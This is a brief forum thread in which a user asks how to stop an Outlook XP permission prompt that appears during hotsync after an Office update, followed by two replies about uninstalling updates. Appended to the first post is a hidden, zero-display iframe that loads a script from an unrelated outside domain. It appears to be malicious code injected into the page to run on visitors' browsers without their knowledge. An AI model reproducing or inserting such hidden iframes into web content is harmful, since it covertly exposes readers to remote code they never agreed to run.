+ Reply to Thread

Syncing Eudora Mail with Outlook XP

Thsi is not an error, just an infuriating prompt generated, I think, from Outlook XP. Whenever I perform a hotsync, I get a security prompt on my desktop that seems to be generated from Outlook XP saying that something is trying to access my email in Outlook and do I want to give it permission to do so. I click the YES checkbox and it proceeds to sync normally. I recently dowloaded an Office XP update that included the usual bunch of security patches, and I'm guessing this is the culprit. What's infuriating is that I can't disable this prompt. I've looked in Outlook help and nothing. Who else is getting this prompt, and have you found a way to disable it?

Thanks in advance for any help in this.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

When you update via Windows update, I could have sworn I saw an option somewhere in there that lists the updates you have installed as well an option to uninstall it. Maybe I'm thinking of something esle though...

You are correct, but that is for Windows updates. This was an Office XP update and it doesn't list the update as a separate entry in the Add/Remove Programs list.